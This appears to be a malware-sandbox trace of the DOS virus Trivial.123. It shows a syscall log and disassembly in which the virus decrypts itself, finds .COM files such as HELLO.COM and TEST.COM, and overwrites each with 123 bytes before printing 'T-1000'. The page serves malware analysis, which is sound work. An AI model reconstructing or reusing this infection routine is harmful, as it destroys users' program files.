Sample viewer

vx.netlux.org/Virus.DOS.Trivial.123

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:53.577371451Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.581251159Z 78 PC: 12a7a | Find first file
2018-12-17T22:49:53.587193085Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:53.5936878Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.608633788Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.611245968Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.624634713Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.627289575Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.629841823Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:53.636363776Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.642842465Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.64597178Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.653741891Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.656795498Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.660225759Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:53.666603344Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.673242546Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.67690317Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.683277297Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.685590929Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.688773793Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:53.695368019Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.702131298Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.707991996Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.715722625Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.717899027Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.721042163Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:53.728270044Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.734644629Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.738487152Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.747469346Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.749765946Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.753237532Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:53.759852641Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.766290751Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.768334986Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.78560352Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.787347251Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.789238017Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:53.795955206Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.802376661Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.805812123Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.814063562Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.81627412Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.819072831Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:53.826125486Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.82911533Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.831740614Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.840370496Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x185
0x12a63: mov cx, 0x69
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: xor cx, cx
0x12a75: mov dx, 0x175
0x12a78: int 0x21
0x12a7a: jb 0x12aa3
0x12a7c: mov ax, 0x3d01
0x12a7f: mov dx, 0x9e
0x12a82: int 0x21
0x12a84: mov bx, ax
0x12a86: mov ah, 0x40
2018-12-17T22:49:53.842608946Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.844905168Z 9 PC: 12aac | Display string (String= 'T-1000')